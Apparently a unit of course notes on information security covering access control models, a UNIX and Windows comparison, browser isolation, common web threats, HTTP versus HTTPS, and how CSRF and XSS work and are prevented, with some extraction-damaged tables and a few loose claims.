UNIT :3

Access control

Access control is a fundamental component of data security that dictates

who’s allowed to access and use company information and resources.
Through authentication and authorization, access control policies make
sure users are who they say they are and that they have appropriate access
to company data.
Access control can also be applied to limit physical access to campuses,
buildings, rooms, and datacenters.

How does access control work?

Access control identifies users by verifying various login credentials,

which can include usernames and passwords, PINs, biometric scans, and
security tokens. Many access control systems also include multifactor
authentication (MFA), a method that requires multiple authentication
methods to verify a user’s identity.
Once a user is authenticated, access control then authorizes the
appropriate level of access and allowed actions associated with that user’s
credentials and IP address.
There are four main types of access control. Organizations typically
choose the method that makes the most sense based on their unique
security and compliance requirements. The four access control models are:
. Discretionary access control (DAC): In this method, the owner
or administrator of the protected system, data, or resource sets the
policies for who is allowed access.
. Mandatory access control (MAC): In this nondiscretionary
model, people are granted access based on an information clearance. A
central authority regulates access rights based on different security levels.
This model is common in government and military environments.
. Role-based access control (RBAC): RBAC grants access based
on defined business functions rather than the individual user’s identity.
The goal is to provide users with access only to data that’s been deemed
necessary for their roles within the organization. This widely used
method is based on a complex combination of role assignments,
authorizations, and permissions.
. Attribute-based access control (ABAC): In this dynamic method,
access is based on a set of attributes and environmental conditions, such
as time of day and location, assigned to both users and resources.

Why is access control important?

Access control keeps confidential information such as customer data, personally
identifiable information, and intellectual property from falling into the wrong
hands. It’s a key component of the modern zero trust security framework, which
uses various mechanisms to continuously verify access to the company network.
Without robust access control policies, organizations risk data leakage from both
internal and external sources.
Access control is particularly important for organizations with hybrid
cloud and multi-cloud cloud environments, where resources, apps, and data
reside both on premises and in the cloud. Access control can provide these
environments with more robust access security.

UNIX AND WINDOWS DIFFERENCES

S. Parameters UNIX Windows

No.

1. Basic It is a command-based It is a menu based

operating system. operating system.

2. Licensing It is an open-source It is a proprietary

system which can be software owned by
used to under General Microsoft.
Public License.

3. User It has a text base It has a Graphical

Interface interface, making it User Interface, making
harder to grasp for it simpler to use.
newcomers.

4. Processing It supports It supports

Multiprocessing. Multithreading.
 S. Parameters UNIX Windows
No.

5. File System

6. Security It is more secure as all It is less secure

changes to the system compared to UNIX.
require explicit user
permission.

7. Data It is tedious to create a It has an integrated

Backup & backup and recovery backup and recovery
Recovery system in UNIX, but it is system that make it
improving with the simpler to use.
introduction of new
distributions of Unix.

8. Hardware Hardware support is Drivers are available

limited in UNIX system. for almost all the
Some hardware might not hardware.
have drivers built for
them.

9. Reliability Unix and its distributions Although Windows

are well known for being has been stable in
very stable to run. recent years, it is still
to match the stability
provided by Unix
systems.

10. Case It is fully case-sensitive, It has case sensitivity

Sensitive and files can be as an option.
considered separate files.

Some issues in Access control

1. Not Secure Enough
2. Keycards Lack True Authorization
3. Improper Setup
4. Inefficient Management

Browser isolation

Browser Isolation (also known as Web Isolation) is a technology that

contains web browsing activity inside an isolated environment, like a
sandbox or virtual machine, in order to protect computers from any
malware the user may encounter.
This isolation may occur locally on the computer or remotely on a server.
Browser Isolation technology provides malware protection for day-to-day
browsing by eliminating the opportunity for malware to access the end
user’s device.
Browser Isolation essentially secures a computer/network from web-
based threats by executing all browsing activity in an isolated virtual
environment. Possible threats are contained in this environment and can’t
infiltrate any part of the user’s ecosystem, such as their computer’s hard-
drive, or other devices on the network. Even though Browser Isolation is
gaining traction as an IT security solution, a lot of misinformation
regarding Browser Isolation remains.

What’s the difference between Browser

Isolation and Remote Browser Isolation?

Remote Browser Isolation is a specific implementation of Browser

Isolation that occurs remotely by moving the execution of all browsing
activity from the user’s computer to a remote server. This remote server
can be hosted in the cloud or located on-premise within an organization’s
network.
However, in the cybersecurity industry, when someone says Browser
Isolation they often really mean Remote Browser Isolation.
The benefit of performing the isolation remotely is that it offers greater
security and requires lower client-side resources as compared to
performing the isolation locally on the user’s computer.
 How does Browser Isolation technology work?

There are different implementation details that vary amongst Browser

Isolation vendors but generally, Browser Isolation works by:

 Removing browsing activity from a user’s computer and

executing it in a virtual environment.
 Automatically destroying the browsing environment at the end
of every browsing session, so if the user ever comes across
anything malicious, it gets wiped away at the end of the session.
When the user connects to the secure virtual browser again,
he/she gets a clean, new image free of any malware. While this
isn’t a requirement for Browser Isolation to work, it’s likely a
common feature in various solutions.

Web Security
Web security is also known as “Cybersecurity”. It basically means
protecting a website or web application by detecting, preventing and
responding to cyber threats.
Websites and web applications are just as prone to security breaches as
physical homes, stores, and government locations. Unfortunately,
cybercrime happens every day, and great web security measures are
needed to protect websites and web applications from becoming
compromised.
That’s exactly what web security does – it is a system of protection
measures and protocols that can protect your website or web application
from being hacked or entered by unauthorized personnel. This integral
division of Information Security is vital to the protection of websites, web
applications, and web services. Anything that is applied over the Internet
should have some form of web security to protect it.

Threats:
Your website or web application’s security depends on the level of
protection tools that have been equipped and tested on it. There are a few
major threats to security which are the most common ways in which a
website or web application becomes hacked. Some of the top
vulnerabilities for all web-based services include:

 SQL injection
 Password breach
 Cross-site scripting
 Data breach
 Remote file inclusion
 Code injection

Preventing these common threats is the key to making sure that your web-
based service is practicing the best methods of security.
Web Security also protects the visitors from the below-mentioned
points –

 Stolen Data: Cyber-criminals frequently hacks visitor’s data that is

stored on a website like email addresses, payment information, and
a few other details.
 Phishing schemes: This is not just related to email, but through
phishing, hackers design a layout that looks exactly like the
website to trick the user by compelling them to give their sensitive
details.
 Session hijacking: Certain cyber attackers can take over a user’s
session and compel them to take undesired actions on a site.
 Malicious redirects. Sometimes the attacks can redirect visitors
from the site they visited to a malicious website.
 SEO Spam. Unusual links, pages, and comments can be displayed
on a site by the hackers to distract your visitors and drive traffic to
malicious websites.

Thus, web security is easy to install and it also helps the business people
to make their website safe and secure. A web application firewall
prevents automated attacks that usually target small or lesser-known
websites. These attacks are born out by malicious bots or malware that
automatically scan for vulnerabilities they can misuse, or cause DDoS
attacks that slow down or crash your website.
Thus, Web security is extremely important, especially for websites or
web applications that deal with confidential, private, or protected
information. Security methods are evolving to match the different types
of vulnerabilities that come into existence.
Differences between HTTP and HTTPS
 HTTP stands for HyperText Transfer Protocol and HTTPS stands
for HyperText Transfer Protocol Secure.
 In HTTP, URL begins with “http://” whereas URL starts with
“https://”
 HTTP uses port number 80 for communication and HTTPS uses
443
 HTTP is considered to be insecure and HTTPS is secure
 HTTP Works at Application Layer and HTTPS works at
Transport Layer
 In HTTP, Encryption is absent and Encryption is present in
HTTPS as discussed above
 HTTP does not require any certificates and HTTPS needs SSL
Certificates
 HTTP speed is faster than HTTPS and HTTPS speed is slower
than HTTP
 HTTP does not improve search ranking while HTTPS improves
search ranking.

What is CSRF?
Cross-site request forgery (also known as CSRF) is a web security
vulnerability that allows an attacker to induce users to perform actions
that they do not intend to perform.

It allows an attacker to partly circumvent the same origin policy, which is

designed to prevent different websites from interfering with each other.

What is the impact of a CSRF attack?

In a successful CSRF attack, the attacker causes the victim user to carry
out an action unintentionally. For example, this might be to change the
email address on their account, to change their password, or to make a
funds transfer. Depending on the nature of the action, the attacker might
be able to gain full control over the user's account. If the compromised
user has a privileged role within the application, then the attacker might
be able to take full control of all the application's data and functionality.
How does CSRF work?

For a CSRF attack to be possible, three key conditions must be in place:

 A relevant action. There is an action within the application that

the attacker has a reason to induce. This might be a privileged
action (such as modifying permissions for other users) or any
action on user-specific data (such as changing the user's own
password).
 Cookie-based session handling. Performing the action involves
issuing one or more HTTP requests, and the application relies
solely on session cookies to identify the user who has made the
requests. There is no other mechanism in place for tracking
sessions or validating user requests.
 No unpredictable request parameters. The requests that perform
the action do not contain any parameters whose values the attacker
cannot determine or guess. For example, when causing a user to
change their password, the function is not vulnerable if an attacker
needs to know the value of the existing password.

Preventing CSRF attacks

The most robust way to defend against CSRF attacks is to include

a CSRF token within relevant requests. The token should be:

 Unpredictable with high entropy, as for session tokens in general.

 Tied to the user's session.
 Strictly validated in every case before the relevant action is
executed.

Cross-site scripting attack

Cross site scripting (XSS) is an attack in which an attacker injects
malicious executable scripts into the code of a trusted application or
website. Attackers often initiate an XSS attack by sending a malicious link to
a user and enticing the user to click it.
What are the different cross site scripting
approaches
Stored XSS. Takes place when the malicious payload is stored in a
database. It renders to other users when data is requested—if there is
no output encoding or sanitization.
Reflected XSS. Occurs when a web application sends attacker-provided
strings to a victim’s browser so that the browser executes part of the
string as code. The payload echoes back in response since it doesn’t have
any server-side output encoding.
DOM-based XSS. Takes place when an attacker injects a script into a
response. The attacker can read and manipulate the document object
model (DOM) data to craft a malicious URL. The attacker uses this URL
to trick a user into clicking it. If the user clicks the link, the attacker can
steal the user’s active session information, keystrokes, and so on. Unlike
stored XSS and reflected XSS, the entire DOM-based XSS attack
happens on the client browser (i.e., nothing goes back to the server).

How can you avoid XSS vulnerabilities

Strategies to prevent XSS attacks include these:

 Never trust user input.

 Implement output encoding.
 Perform user input validation.
 Follow the defense in depth principle.
 Ensure that web application development aligns with OWASP’s
XSS Prevention Cheat Sheet.
 After remediation, perform penetration testing to confirm it was
successful.
Protect your organization by following secure development guidelines—
building security in at all phases of the application’s development. Output
encoding is also key to preventing XSS vulnerabilities. Make use of
output encoding libraries that are relevant to the programming languages
and frameworks your organization uses. Also, ensure your developers
stay up-to-date with XSS prevention best practices.